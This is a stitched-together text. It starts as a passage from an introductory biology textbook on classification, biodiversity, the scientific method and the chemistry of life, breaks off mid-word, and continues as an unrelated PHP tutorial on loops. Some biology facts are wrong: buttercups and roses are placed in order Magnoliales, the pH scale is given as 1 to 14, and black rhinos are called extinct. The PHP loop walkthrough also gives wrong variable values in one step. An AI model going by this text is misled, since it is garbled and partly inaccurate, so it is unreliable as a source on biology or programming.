them as distinct groups long ago. But many, many,
eukaryotes don’t fit into these three kingdoms. A whole
world of microscopic protists exists in a drop of pond
water. The protists are so diverse that some biologists
think they should be separated into as many as 11
kingdoms of their own.


Classifying Living Things 


Much like you’d draw a family tree to show the relationships
between your parents, grandparents, and other members of
your family, biologists use a phylogenetic tree (a drawing that
shows the relationships among a group of organisms) to
represent the relationships among living things.


Although you probably know how your family members are 
related to each other, biologists have to use clues to figure 
out the relationships among living things. The types of clues 
they use to figure out these relationships include 


Physical structures: The structures that biologists use 
for comparison may be large, like feathers, or very small, 
like a cell wall. 


Chemical components: Some organisms produce unique 
chemicals. Bacteria, for example, are the only cells 
that make the hybrid sugar-protein molecule called 
peptidoglycan. 


Genetic information: An organism’s genetic code deter- 
mines its traits, so by reading the genetic code in DNA, 
biologists can go right to the source of differences among 
species. 


The more characteristics two organisms have in common 
with each other, the more closely related they are. 
Characteristics that organisms have in common are called 
shared characteristics. 


Based on structural, cellular, biochemical, and genetic characteristics, 
biologists can classify life on Earth into groups that 
reflect the evolutionary history of the planet. That history 
indicates that all life on Earth began from one original univer- 
sal ancestor after the Earth formed 4.5 billion years ago. All 
the diversity of life that exists today is related because it’s 
descended from that original ancestor. 


Organizing Life into Smaller and 
Smaller Groups: Taxonomy 


Biologists need to work with small groups of living things in 
order to determine how similar the different types of organ- 
isms are. Hence, the creation of the taxonomic hierarchy, a 
naming system that ranks organisms by their evolutionary 
relationships. Within this hierarchy, living things are orga- 
nized from the largest, most-inclusive group down to the 
smallest, least-inclusive group. 


The taxonomic hierarchy is as follows, from largest to smallest. 


Domain: Domains group organisms by fundamental 
characteristics such as cell structure and chemistry. For 
example, organisms in domain Eukarya are separated 
from those in the Bacteria and Archaea domains based 
on whether their cells have a nucleus, the types of mole- 
cules found in the cell wall and membrane, and how they 
go about protein synthesis. (We introduced the three 
domains in the earlier section “Meet Your Neighbors: 
Looking at Life on Earth.”) 


Kingdom: Kingdoms group organisms based on developmental 
characteristics and nutritional strategy. For 
example, organisms in the animal kingdom (Animalia) 
are separated from those in the plant kingdom (Plantae) 
because of differences in the early development of these 
organisms and the fact that plants make their own food 
by photosynthesis, whereas animals ingest their food. 
(Kingdoms are most useful in domain Eukarya because 
they’re not well defined for the prokaryotic domains.) 


Phylum: Phyla separate organisms based on key characteristics 
that define the major groups within the kingdom. 
For example, within kingdom Plantae, flowering 
plants (Angiosperms) are in a different phylum than 
cone-bearing plants (Conifers). 


Class: Classes separate organisms based on key characteristics 
that define the major groups within the phylum. 
For example, within phylum Angiophyta, plants that have 
two seed leaves (dicots, class Magnoliopsida) are in a 
separate class than plants with one seed leaf (monocots, 
class Liliopsida). 


Order: Orders separate organisms based on key charac- 
teristics that define the major groups within the class. 
For example, within class Magnoliopsida, nutmeg plants 
(Magnoliales) are put in a different order than black 
pepper plants (Piperales) due to differences in their 
flower and pollen structure. 


Family: Families separate organisms based on key 
characteristics that define the major groups within the 
order. For example, within order Magnoliales, buttercups 
(Ranunculaceae) are in a different family than roses 
(Rosaceae) due to differences in their flower structure. 


Genus: Genera separate organisms based on key charac- 
teristics that define the major groups within the family. 
For example, within family Rosaceae, roses (Rosa) are in 
a different genus than cherries (Prunus) thanks to differ- 
ences in their flower structure. 


Species: Species separate eukaryotic organisms based 
on whether they can successfully reproduce with each 
other. You can walk through a rose garden and see many 
different colors of China roses (Rosa chinensis) that are 
all considered one species because they can reproduce 
with each other. 


Think of how biologists organize living things like how you 
might organize your clothing. In your first round of organiz- 
ing, you might make groups of pants, shirts, socks, and shoes. 
From there, you might go into the shirt group and organize 
your shirts into smaller groups, such as short-sleeved versus 
long-sleeved shirts. Then perhaps you’d organize them by type 
of fabric, then color, and so on. At some point, you’d have 
very small groups with very similar articles of clothing — 
perhaps a group of two short-sleeved, button-down, blue 
shirts, for example. All your clothing would be organized in a 
hierarchy, from the big category of clothing all the way down 
to the small category of short-sleeved, button-down, blue 
shirts. 


Table 1-1 compares the classification, or taxonomy, of you, a 
dog, a carrot, and E. coli. 


Table 1-1  Comparing the Taxonomy of Several Species 


Taxonomic Group  Human       Dog            Carrot                   E. coli
Domain           Eukarya     Eukarya        Eukarya                  Bacteria
Kingdom          Animalia    Animalia       Plantae                  Eubacteria
Phylum           Chordata    Chordata       Angiophyta               Proteobacteria
Class            Mammalia    Mammalia       Magnoliopsida            Gammaproteobacteria
Order            Primates    Carnivora      Apiales                  Enterobacteriales
Family           Hominidae   Canidae        Apiaceae (Umbelliferae)  Enterobacteriaceae
Genus            Homo        Canis          Daucus                   Escherichia
Species          H. sapiens  C. familiaris  D. carota                E. coli


Of the organisms listed in Table 1-1, you have the most in 
common with a dog. You’re both animals possessing a central 
nervous chord (phylum Chordata), and you’re both mammals 
(class Mammalia), which means you have hair and the females 
of your species make milk. However, you also have many dif- 
ferences, including the tooth structure that separates you into 
the order Primates and a dog into the order Carnivora. If you 
compare yourself to a plant, you can see that you have certain 
features of cell structure that place you together in domain 
Eukarya, but little else in common. 


Two organisms that belong to the same species are the most 
similar of all. For most eukaryotic organisms, members of the 
same species can successfully sexually reproduce together, 
producing live offspring that can also reproduce. Bacteria and 
archaea don’t reproduce sexually, so their species are defined 
by chemical and genetic similarities. 


Biodiversity: Our Differences 
Make Us Stronger 


The diversity of living things on Earth is referred to as bio- 
diversity. Almost everywhere biologists have looked on 
this planet — from the deepest, darkest caves to the lush 
Amazonian rain forests to the depths of the oceans — they’ve 
found life. In the deepest, darkest caves where no light ever 
enters, bacteria obtain energy from the metals in the rocks. In 
the Amazonian rain forest, plants grow attached to the tops of 
trees, collecting water and forming little ponds in the sky that 
become home to insects and tree frogs. In the deep oceans, 
blind fish and other animals live on the debris that drifts 
down to them like snow from the lit world far above. Each of 
these environments presents a unique set of resources and 
challenges, and life on Earth is incredibly diverse due to the 
ways in which organisms have responded to these challenges 
over time. 


The following sections clue you in not only to the reasons 
why biodiversity is so important and how human actions are 
harming it but also how human actions can protect biodiver- 
sity moving forward. 


Valuing biodiversity 


Biodiversity is important — and worth valuing — for the fol- 
lowing reasons: 


The health of natural systems depends on biodiversity. 
Scientists who study the interconnections between differ- 
ent types of living things and their environments believe 
that biodiversity is important for maintaining balance 
in natural systems. Each type of living thing plays a role 
in its environment, and the loss of even one species can 
have widespread effects. 


Many economies rely upon natural environments. A 
whole industry called ecotourism has grown up around 
tour guides leading people on trips through natural habi- 
tats and explaining the local biology along the way. 


Human medicines come from other living things. For 
example, the anticancer drug paclitaxel (Taxol) was origi- 
nally obtained from the bark of the Pacific yew, and the 
heart medicine digitalin comes from the foxglove plant. 


Biodiversity adds to the beauty of nature. Natural sys- 
tems have an aesthetic value that’s pleasing to the eye 
and calming to the mind in today’s technologically driven 
world. 


Surveying the threats posed 
by human actions 


As the human population grows and uses more and more of 
the Earth’s resources, the populations of other species are 
declining as a direct result. Following are the ways in which 
human actions pose major threats to biodiversity: 


Development is reducing the size of natural environ- 
ments. People need places to live and farms to raise 
food. In order to meet these needs, they burn rain for- 
ests, drain wetlands, cut down forests, pave over valleys, 
and plow up grasslands. Whenever people convert land 
for their own use, they destroy the habitats of other spe- 
cies, causing habitat loss. 


Unnatural, human-produced wastes are polluting the 
air and water. Automobiles and factories burn gasoline 
and coal, releasing pollution into the air. Metals from 
mining and chemicals from factories, farms, and homes 
get into groundwater. After pollution enters the air and 
water, it travels around the globe and can hurt multiple 
species, including humans. 


The overharvesting of species to provide food and 
other materials for human consumption is driving some 
species to near extinction. Because they can repro- 
duce, living things such as trees and fish are considered 
renewable resources. However, if people harvest these 
resources faster than they can replace themselves, the 
numbers of individual trees and fish decline. If too few 
members of a species remain, the survival of that species 
becomes very unlikely. 


Human movements around the globe sometimes carry 
species into new environments. An introduced (or non-native) 
species is a foreign species that’s brought into 
a new environment. Introduced species that are very 
aggressive and take over habitats are called invasive spe- 
cies. Invasive species often have a large environmental 
impact and cause the numbers of native species (organ- 
isms belonging to a particular habitat) to decline; they 
can also attack crop plants and cause human diseases. 


Exploring the extinction of species 


The combined effects of all the various human actions in 
Earth’s ecosystems are reducing the planet’s biodiversity. In 
fact, the rate of extinctions is increasing along with the size of 
the human population. No one knows for certain how exten- 
sive the loss of species due to human impacts will ultimately 
be, but there’s no question that human practices such as 
hunting and farming have already caused numerous species 
to become extinct. 


Many scientists believe Earth is experiencing its sixth mass 
extinction, a certain time period in geologic history that shows 
dramatic losses of many species. (The most famous mass 
extinction event is the one that occurred about 65 million years 
ago and included the extinction of the dinosaurs.) Scientists 
theorize that most of the past mass extinctions were caused by 
major changes in Earth’s climate and that the current extinc- 
tions (most recently including black rhinos, Zanzibar leopards, 
and golden toads) began as a result of human land use but may 
increase as a result of global warming. 


The loss in biodiversity that’s currently happening on Earth 
could have effects beyond just the loss of individual species. 
Living things are connected to each other and their environ- 
ment in how they obtain food and other resources necessary 
for survival. If one species depends on another for food, for 
example, then the loss of a prey species can cause a decline in 
the predator species. 


The sections that follow introduce you to two classifications 
of species that biologists are keeping an eye on when it comes 
to questions of extinction. 


Keystone species 


Some species are so connected with other organisms in their 
environment that their extinction changes the entire com- 
position of species in the area. Species that have such great 
effects on the balance of other species in their environment 
are called keystone species. As biodiversity decreases, key- 
stone species may die out, causing a ripple effect that leads 
to the loss of many more species. If biodiversity gets too low, 
then the future of life itself becomes threatened. 


An example of a keystone species is the purple seastar, which 
lives on the northwest Pacific coast of the United States. 
Purple seastars prey on mussels in the intertidal zone. When 
the seastars are present, they keep the mussel population in 
check, allowing a great diversity of other marine animals to 
live in the intertidal zone. If the seastars are removed from 
the intertidal zone, however, the mussels take over, and many 
species of marine animals disappear from the environment. 


Indicator species 


One way biologists can monitor the health of particular envi- 
ronments and the organisms that live in them is by measuring 
the success of indicator species: species whose presence 
or absence in an environment gives information about that 
environment. 


In the Pacific Northwest region of the United States, the health 
of old-growth forests is measured by the success of the north- 
ern spotted owl, a creature that can make its home and find 
food only in mature forests that are hundreds of years old. As 
logging decreases the number and size of these old forests, 
the number of spotted owls has declined, thereby making the 
number of spotted owls an indicator of the health, or even the 
existence, of old-growth forests in the Pacific Northwest. Of 
course, old-growth forests aren’t just home to spotted owls — 
they shelter a rich diversity of living things including plants, 
such as sitka spruce and Western hemlock, and animals, such 
as elk, bald eagles, and flying squirrels. Old-growth forests 
also perform important environmental functions such as pre- 
venting erosion, floods, and landslides; improving water qual- 
ity; and providing places for salmon to spawn. If old-growth 
forests become extinct in the Pacific Northwest, the effects 
will be far reaching and have many negative impacts on the 
people and other species in the area. 


Protecting biodiversity 


Biodiversity increases the chance that at least some living 
things will survive in the face of large changes in the environ- 
ment, which is why protecting it is crucial. What can people 
do to protect biodiversity and the health of the environment 
in the face of the increasing demands of the human popula- 
tion? No one has all the answers, but here are a few ideas 
worth trying: 


Keep wild habitats as large as possible and connect 
smaller ones with wildlife corridors (stretches of land or 
water that wild animals travel as they migrate or search 
for food) so organisms that need a big habitat to thrive 
can move among smaller ones. 


Use existing technologies and develop new ones to 
decrease human pollution and clean up damaged habi- 
tats. Technologies that have minimal effects on the envi- 
ronment are called clean or green technologies. Some 
businesses are trying to use these technologies in order 
to reduce their impact on the environment. 


Strive for sustainability in human practices includ- 
ing manufacturing, fishing, logging, and agriculture. 
Something that’s sustainable meets current human needs 
without decreasing the ability of future generations to 
meet their needs. 


Regulate the transport of species around the world so 
that species aren’t introduced into foreign habitats. This 
step includes being careful about the transport of not-so- 
obvious species. For example, ships traveling from one 
port to another are often asked to empty their ballast 
water offshore so they don’t accidentally release organ- 
isms from other waters into their destination harbors. 


Making Sense of the World 
through Observations 


The true heart of science isn’t a bunch of facts — it’s the 
method that scientists use to gather those facts. Science 
is about exploring the natural world, making observations 
using the five senses, and attempting to make sense of those 
observations. Scientists, including biologists, use two main 
approaches when trying to make sense of the natural world: 


Discovery science: When scientists seek out and observe 
living things, they’re engaging in discovery science, study- 
ing the natural world and looking for patterns that lead 
to new, tentative explanations of how things work (these 
explanations are called hypotheses). If a biologist doesn’t 
want to disturb an organism’s habitat, he or she may use 
observation to find out how a certain animal lives in its 
natural environment. Making useful scientific observations 
involve writing detailed notes about the routine of 
the animal for a long period of time (usually years) to be 
sure that the observations are accurate. 


 Hypothesis-based science: When scientists test their 
understanding of the world through experimentation, 
they’re engaging in hypothesis-based science, which usu- 
ally calls for following some variation of a process called 
the scientific method (which we explain in a moment). 
Modern biologists are using hypothesis-based science to 
try to understand many things, including the causes and 
potential cures of human diseases and how DNA controls 
the structure and function of living things. 


Hypothesis-based science can be a bit more complex than 
discovery science and relies on the scientific method. The 
scientific method is basically a plan that scientists follow while 
performing scientific experiments and writing up the results. 
It allows experiments to be duplicated and results to be 
communicated uniformly. Here’s the general process of the 
scientific method: 


1. Make observations and come up with questions. 


The scientific method starts when scientists notice 
something and ask questions like “What’s that?” or 
“How does it work?” just like a child might when he 
sees something new. 


2. Form a hypothesis. 


Much like Sherlock Holmes, scientists piece together 
clues to try to come up with the most likely hypoth- 
esis (explanation) for a set of observations. This 
hypothesis represents scientists’ thinking about pos- 
sible answers to their questions. 


Say, for example, a marine biologist is exploring some 
rocks along a beach and finds a new worm-shaped 
creature he has never seen before. His hypothesis is 
that the creature is some kind of worm. 


One important point about a scientific hypothesis is 
that it must be testable, or falsifiable. In other words, 
it has to be an idea that you can support or reject by 
exploring the situation further using your five senses. 


3. Make predictions and design experiments to test the 
idea(s). 


Predictions set up the framework for an experiment 
to test a hypothesis, and they’re typically written as 
“if... then” statements. 


If the marine biologist predicts that the creature he 
found is a worm, then its internal structures should 
look like those in other worms he has studied. 


4. Test the idea(s) through experimentation. 


Scientists must design their experiments carefully in 
order to test just one idea at a time. As they conduct 
their experiments, scientists make observations 
using their five senses and record these observations 
as their results or data. Scientists conduct multiple 
tests to ensure that their observations are repeatable. 


Continuing with the worm example, the marine biolo- 
gist tests his hypothesis by dissecting the wormlike 
creature, examining its internal parts carefully with 
the assistance of a microscope, and making detailed 
drawings of its internal structures. 


5. Make conclusions about the findings. 


Scientists interpret the results of their experiments 
through deductive reasoning, using their specific 
observations to test their general hypothesis. When 
making deductive conclusions, scientists consider 
their original hypothesis and ask whether it could still 
be true in light of the new information gathered during 
the experiment. If so, the hypothesis can remain as a 
possible explanation for how things work. If not, scien- 
tists reject the hypothesis and try to come up with an 
alternate explanation (a new hypothesis) that could 
explain what they’ve seen. 


In the worm example, the marine biologist discovers 
that the internal structures of the wormlike creature 
look very similar to another type of worm he’s familiar 
with. He can therefore conclude that the new animal is 
likely a relative of that other type of worm. 


6. Communicate the conclusions with other scientists. 


Communication is a huge part of science. Without it, 
discoveries can’t be passed on, and old conclusions 
can’t be tested with new experiments. When scientists 
complete some work, they write a paper that explains 
exactly what they did, what they saw, and what they 
concluded. Then they submit that paper to a scientific 
journal in their field. Scientists also present their work 
to other scientists at meetings, including those spon- 
sored by scientific societies. In addition to sponsoring 
meetings, these societies support their respective dis- 
ciplines by printing scientific journals and providing 
assistance to teachers and students in the field. 


Chapter 2 
The Chemistry of Life 


In This Chapter 
Seeing why matter is so important 
Distinguishing atoms, elements, isotopes, molecules, and compounds 
Getting to know acids and bases 
Understanding the structure and function of important molecules 
for life 


Everything that has mass and takes up space, including 
you and the rest of life on Earth, is made of matter. 
Atoms make up molecules, which make up the substance 
of living things. Carbohydrates, proteins, nucleic acids, and 
lipids are four kinds of molecules that are especially impor- 
tant to the structure and function of organisms. In this chap- 
ter, we present a bit of the basic chemistry that’s essential for 
understanding biology. 


Exploring Why Matter Matters 


Matter is the stuff of life — literally. Every living thing is made 
of matter. In order to grow, living things must get more matter 
to build new structures. When living things die, be they plants 
or animals, microbes such as bacteria and fungi digest the 
dead matter and recycle it so that other living things can use 
it again. In fact, pretty much all the matter on Earth has been 
here since the planet formed 4.5 billion years ago; it has just 
been recycled since then. So, the stuff that makes up your 
body may once have been part of Tyrannosaurus rex, a butter- 
fly, or even a bacterium. 


Following are a few facts you should know about matter: 


Matter takes up space. Space is measured in volume, and 
volume is measured in liters (L). 


Matter has mass. Mass is the term for describing the 
amount of matter that a substance has. It’s measured 
in grams (g). Earth’s gravity pulls on your mass, so the 
more mass you have, the more you weigh. 


Matter can take several forms. The most familiar forms 
of matter are solids, liquids, and gases. Solids have a defi- 
nite shape and size, such as a person or a brick. Liquids 
have a definite volume. They can fill a container, but they 
take the shape of the container that they fill. Gases are 
easy to compress and expand to fill a container. 


To understand the difference between mass and weight, com- 
pare your weight on Earth versus your weight on the Moon. 
No matter where you are, your body is made of the same 
amount of stuff, or matter. But the Moon is so much smaller 
than Earth that it has a lot less gravity to pull on your mass. 
So, your weight on the Moon would be just one-sixth of your 
weight on Earth, but your mass would remain the same. 


The Differences among Atoms, 
Elements, and Isotopes 


All matter is composed of elements. When you break down 
matter into its smallest components, you’re left with indi- 
vidual elements that themselves break down into atoms con- 
sisting of even smaller pieces called subatomic particles. And 
sometimes the number of those subatomic particles within a 
particular atom differs, creating isotopes. This section has the 
scoop on all these components of matter. 


Tiny, mighty atoms 


An atom is the smallest whole, stable piece of an element that 
still has all the properties of that element. It’s the smallest 
“piece” of matter that can be measured. 


Here’s the basic breakdown of an atom’s structure: 


The core of an atom, called the nucleus, contains two 
kinds of subatomic particles: protons and neutrons. 
Both have mass, but only one carries any kind of charge. 
Protons carry a positive charge, but neutrons have no 
charge (they’re neutral). Because the protons are posi- 
tive and the neutrons have no charge, the net charge of 
an atom’s nucleus is positive. 


Clouds of electrons surround the nucleus. Electrons 
carry a negative charge but have almost no mass. 


Atoms become ions when they gain or lose electrons. In other 
words, ions are essentially charged atoms. Positive (+) ions 
have more protons than electrons; negative (-) ions have 
more electrons than protons. Positive and negative charges 
attract one another, allowing atoms to form bonds, as we 
explain in the upcoming “Molecules, Compounds, and Bonds” 
section. 


Elements of elements 


An element is a substance made of atoms that have the same 
number of protons. Think of them as “pure” substances all 
made of the same thing. 


Living things use only a handful of the elements in nature. 
The four most common are hydrogen, carbon, nitrogen, 
and oxygen, all of which are found in air, plants, and water. 
(Several other elements exist in smaller amounts in organ- 
isms, including sodium, magnesium, phosphorus, sulfur, chlo- 
rine, potassium, and calcium.) 


I so dig isotopes 


All atoms of an element have the same number of protons, but 
the number of neutrons can change. If the number of neutrons 
differs between two atoms of the same element, the atoms are 
called isotopes of the element. 


For example, carbon-12 and carbon-14 are two isotopes of 
the element carbon. Atoms of carbon-12 have 6 protons and 
6 neutrons. These carbon atoms have a mass number of 12 
because their mass is equal to 12. Atoms of carbon-14 still 
have 6 protons (because all carbon atoms have 6 protons), 
but they have 8 neutrons, giving them a mass number of 14. 


Molecules, Compounds, 
and Bonds 


When you start putting elements together, you get more 
complex forms of matter, such as molecules and compounds. 
Molecules are made of two or more atoms, and compounds are 
molecules that contain at least two different elements. 


One way to sort out the differences among elements, mol- 
ecules, and compounds is to think about making chocolate 
chip cookies. First, you need to mix the wet ingredients: 
butter, sugar, eggs, and vanilla. Consider each of those 
ingredients a separate element. You need two sticks of the 
element butter. When you combine butter plus butter, you 
get a molecule of butter. Before you add the element of eggs, 
you need to beat them. So, when you add egg plus egg in 
a little dish, you get a molecule of eggs. To mix all the wet 
ingredients together, the molecule of butter is combined with 
the molecule of eggs, and you get a compound called “wet.” 
Next, you need to mix together the dry ingredients: flour, salt, 
and baking soda. Think of each ingredient as a separate ele- 
ment. When all the dry ingredients are mixed together, you 
get a compound called “dry.” Only when the wet compound 
is mixed with the dry compound is the reaction sufficiently 
ready for the most important element: the chocolate chips. 


So what holds the elements of molecules and compounds 
together? Bonds, of course. Two important types of bonds 
exist in living things: 


Ionic bonds hold ions joined by their opposite electrical 
charges. Ionic reactions occur when atoms combine and 
lose or gain electrons. When sodium (Na) and chlorine 
(Cl) combine, for example, sodium loses an electron to 
chlorine. Sodium becomes the positively charged sodium 
ion (Na+), and chlorine becomes the negatively charged 
chloride ion (Cl-). These two oppositely charged ions are 
attracted to each other, forming an ionic bond. 


Covalent bonds form when atoms share electrons in a 
covalent reaction. When two oxygen atoms join to form 
an oxygen molecule, they share two pairs of electrons 
with each other. Each shared pair of electrons is one 
covalent bond, so the two pairs of shared electrons in 
a molecule of oxygen gas have a double bond. Covalent 
bonds are extremely important in biology because they 
hold together the backbones of all biological molecules. 


Acids and Bases 


Some substances, such as lemon juice and vinegar, have a 
real edge when you taste them. Others, such as battery acid 
and ammonia, are so caustic you don’t even want to get them 
on your skin. These substances are acids and bases, both of 
which have the potential to damage cells. 


Acids are molecules that can split apart in water and 
release hydrogen ions (H+). A common example is 
hydrochloric acid (HCl). When HCl is added to water, 
it splits apart into H+ and Cl-, increasing the number of 
hydrogen ions in the water/HCl solution. 


Bases are molecules that can split apart in water and 
release hydroxide ions (OH-). The most common example 
is sodium hydroxide (NaOH). When NaOH is added to 
water, it splits apart into Na+ and OH-. 


Charged particles, like hydrogen and hydroxide ions, can 
interfere with the chemical bonds that hold molecules together. 
Because living things are made of molecules, strong acids and 
bases can release enough of these ions to cause damage. 


The relative concentration of hydrogen to hydroxide ions is 
represented by the pH scale. The following sections explain 
the pH scale and how organisms regulate their pH. 


“Ph”iguring out the pH scale 


The pH scale is a system of classifying how acidic or basic a 
solution is. The term pH symbolizes the hydrogen ion concentration 
in a solution (what proportion of a solution contains 
hydrogen ions). The pH scale goes from 1 to 14. A pH of 7 is 
neutral, meaning the amount of hydrogen ions and hydroxide 
ions in a solution with a pH of 7 is equal, just like in pure water. 


A solution that contains more hydrogen ions than hydroxide 
ions is acidic, and the pH of the solution is less than 7. If a 
molecule releases hydrogen ions in water, it’s an acid. The 
more hydrogen ions it releases, the stronger the acid, and the 
lower the pH value. A solution that contains more hydroxide 
ions than hydrogen ions is basic, and its pH is higher than 7. 


Buffing up on buffers 


In organisms, blood and cytoplasm are the “solutions” in 
which the required ions (for example, electrolytes) float. 
That’s why most substances in the body hover around the 
neutral pH of 7. However, nothing’s perfect, so the human 
body has a backup system in case things go awry. A system of 
buffers exists to help neutralize the blood if excess hydrogen 
or hydroxide ions are produced. 


Buffers keep solutions at a steady pH by combining with 
excess hydrogen (H⁺) or hydroxide (OH⁻) ions. Think of them 
as sponges for hydrogen and hydroxide ions. If a substance 
releases these ions into a buffered solution, the buffers will 
“soak up” the extra ions. 


The most common buffers in the human body are bicarbonate 
ion (HCO₃⁻) and carbonic acid (H₂CO₃). Bicarbonate ion carries 
carbon dioxide through the bloodstream to the lungs to 
be exhaled, but it also acts as a buffer. Bicarbonate ion takes 
up extra hydrogen ions, forming carbonic acid and preventing 
the pH of the blood from going too low. If the opposite situation 
occurs and the pH of the blood gets too high, carbonic 
acid breaks apart to release some hydrogen ions, which 
brings the pH back into balance. 


Carbon-Based Molecules: 
The Basis for All Life 


All living things rely pretty heavily on one particular type of 
molecule: carbon. The little ol’ carbon atom, with its six protons 
and an outer shell of four electrons, is the central focus 
of organic chemistry, which is the chemistry of living things. 
When carbon bonds to hydrogen (which happens frequently 
in organic molecules), the carbon and hydrogen atoms share 
a pair of electrons in a covalent bond. Molecules with a lot of 
carbon-hydrogen bonds are called hydrocarbons. Nitrogen, 
sulfur, and oxygen are also often joined to carbon in organisms. 


So where do the carbon-containing molecules come from? The 
answer’s simple: food. Some living things, like people, need 
to eat other living things to get their food, but some organisms, 
like plants, can make their own food. Regardless of the 
food source, all living things use food as a supply of 
carbon-containing molecules. 


Carbon atoms are central to all organisms because they’re 
found in carbohydrates, proteins, nucleic acids, and lipids — 
otherwise known as the structural materials of all living 
things. The sections that follow describe the roles of these 
materials. 


Providing energy: Carbohydrates 


Carbohydrates, as the name implies, consist of carbon, 
hydrogen, and oxygen. The basic formula for carbohydrates 
is CH₂O, meaning the core structure of a carbohydrate is one 
carbon atom, two hydrogen atoms, and one oxygen atom. 
This formula can be multiplied; for example, glucose has the 
formula C₆H₁₂O₆, which is six times the ratio but still the same 
basic formula. 


Carbohydrates are energy-packed compounds. Living creatures 
can break carbohydrate

;$j<=9;$j++) 
{ 
    $result = $i * $j; 
    echo "$i X $j = $result\n"; 
} 
} 

The output is as follows: 

Multiply by 1 
1 X 1 = 1 
1 X 2 = 2 

1 X 8 = 8 
1 X 9 = 9 

Multiply by 2 
2 X 1 = 2 
2 X 2 = 4 

2 X 8 = 16 
2 X 9 = 18 

Multiply by 3 
3 X 1 = 3 

And so on. 
The structure of a for loop is quite flexible and allows you to build loops 
for almost any purpose. Although the basic for loop discussed so far in this 
section has one statement in its starting, conditional, and increment sections, 
the general format allows more than one statement in each section. 
The general format is: 

for (beginning statements; conditional statements; ending statements) 
{ 
    block of statements; 
} 

The statements within a for loop have the following roles: 

♦ The beginning statements execute once at the start of the loop. They 
can be statements that set any needed starting values or other statements 
that you want to execute before your loop starts running. 
♦ The conditional statements are tested for each iteration of your loop. 

♦ The ending statements execute once at the end of the loop. They can be 
statements that increment your values or any other statements that you 
want to execute at the end of your loop. 

Each statement section is separated by a semicolon (;). Each section can 
contain as many statements as needed, separated by commas. Any section 
can be empty. 

The following loop has statements in all three sections: 

$t = 0; 
for ($i=0,$j=1;$t<=4;$i++,$j++) 
{ 
    $t = $i + $j; 
    echo "$t<br />"; 
} 

In this example, $i=0 and $j=1 are the beginning statements, $t<=4 is the 
conditional statement, and $i++ and $j++ are the ending statements. 

The output of these statements is as follows: 

1 

3 

5 

The loop is executed in the following order: 

1. The beginning section containing two statements is executed. 

$i is set to 0, and $j is set to 1. 

2. The conditional section containing one statement is evaluated. 

Is $t less than or equal to 4? Yes, so the statement is true. The loop 
continues to execute. 

3. The statements in the statement block are executed. 

$t becomes equal to $i plus $j, which is 0 + 1, which equals 1. Then 
$t is echoed to give the output 1. 

4. The ending section containing two statements ($i++ and $j++) is 
executed. 

Both $i and $j are incremented by 1, so $i now equals 1, and $j now 
equals 2. 

5. The conditional section is evaluated. 

Is $t less than or equal to 4? Because $t is equal to 1 at this point, the 
statement is true. The loop continues to execute. 

6. The statements in the statement block are executed. 

$t becomes equal to $i plus $j, which is 1 + 2, which equals 3. Then 
$t is echoed to give the output 3. 

7. The ending section containing two statements ($i++ and $j++) is 
executed. 

Both $i and $j are incremented by 1, so $i now equals 2, and $j now 
equals 3. 

8. The conditional section is evaluated. 

Is $t less than or equal to 4? Because $t now equals 3, the statement is 
true. The loop continues to execute. 

9. The statements in the statement block are executed. 

$t becomes equal to $i plus $j, which is 2 + 3, which equals 5. Then 
$t is echoed to give the output 5. 

10. The ending section containing two statements ($i++ and $j++) is 
executed. 

Both $i and $j are incremented by 1, so $i now equals 2, and $j now 
equals 3. 

11. The conditional section is evaluated. 

Is $t less than or equal to 4? Because $t now equals 5, the statement is 
not true. The loop doesn’t continue to execute. The loop ends, and the 
script continues to the next statement after the end of the loop. 

Using while loops 

A while loop continues repeating as long as certain conditions are true. The 
loop works as follows: 

1. You set up a condition. 

2. The condition is tested at the top of each loop. 

3. If the condition is true, the loop repeats. If the condition is not true, the 
loop stops. 

The following is the general format of a while loop: 

while ( condition ) 
{ 
    block of statements 
} 

The following statements set up a while loop that looks through an array 
for an apple: 

$fruit = array ( "orange", "apple", "grape" ); 
$testvar = "no"; 
$k = 0; 
while ( $testvar != "yes" ) 
{ 
    if ($fruit[$k] == "apple" ) 
    { 
        $testvar = "yes"; 
        echo "apple\n"; 
    } 
    else 
    { 
        echo "$fruit[$k] is not an apple\n"; 
    } 
    $k++; 
} 

These statements generate the following output: 

orange is not an apple 
apple 

The script executes the statements as follows: 

1. The variables are set before starting the loop. 

$fruit is an array with three values, $testvar is a test variable set to 
"no", and $k is a counter variable set to 0. 

2. The loop starts by testing whether $testvar != "yes" is true. 

Because $testvar was set to "no", the statement is true, so the loop 
continues. 

3. The condition in the if statement is tested. 

Is $fruit[$k] == "apple" true? At this point, $k is 0, so the script 
checks $fruit[0]. Because $fruit[0] is "orange", the statement is 
not true. The statements in the if block aren’t executed, so the script 
skips to the else statement. 

4. The statement in the else block is executed. 

The else block outputs the line "orange is not an apple". This is 
the first line of the output. 

5. $k is incremented by one. 

Now $k becomes equal to 1. 

6. The bottom of the loop is reached. 

Flow returns to the top of the while loop. 

7. The condition $testvar != "yes" is tested again. 

Is $testvar != "yes" true? Because $testvar hasn’t been changed 
and is still set to "no", it is true, so the loop continues. 

8. The condition in the if statement is tested again. 

Is $fruit[$k] == "apple" true? At this point, $k is 1, so the script 
checks $fruit[1]. Because $fruit[1] is "apple", the statement is 
true. So the loop enters the if block. 

9. The statements in the if block are executed. 

These statements set $testvar to "yes" and output "apple". This is 
the second line of the output. 

10. $k is incremented again. 

Now $k equals 2. 

11. The bottom of the loop is reached again. 

Once again, the flow returns to the top of the while loop. 

12. The condition $testvar != "yes" is tested one last time. 

Is $testvar != "yes" true? Because $testvar has been changed 
and is now set to "yes", it is not true. The loop stops. 

It’s possible to write a while loop that is infinite — that is, a loop that loops 
forever. You can easily, without intending to, write a loop in which the condition 
is always true. If the condition never becomes false, the loop never 
ends. For a discussion of infinite loops, see the section “Avoiding infinite 
loops,” later in this chapter. 


Using do..while loops 

A do..while loop is very similar to a while loop. Like a while loop, a 
do..while loop continues repeating as long as certain conditions are true. 
Unlike while loops, however, those conditions are tested at the bottom of 
each loop. If the condition is true, the loop repeats. When the condition is 
not true, the loop stops. 

The general format for a do..while loop is as follows: 


do 

{ 

block of statements 
} while ( condition ); 

The following statements set up a loop that looks for an apple. This script 
does the same thing as the script in the preceding section that uses a while 
loop: 

$fruit = array ( "orange", "apple", "grape" ); 
$testvar = "no"; 
$k = 0; 
do 
{ 
    if ($fruit[$k] == "apple" ) 
    { 
        $testvar = "yes"; 
        echo "apple\n"; 
    } 
    else 
    { 
        echo "$fruit[$k] is not an apple\n"; 
    } 
    $k++; 
} while ( $testvar != "yes" ); 

The output of these statements in a browser is as follows: 

orange is not an apple 
apple 

This is the same output shown for the while loop example. The difference 
between a while loop and a do..while loop is where the condition is 
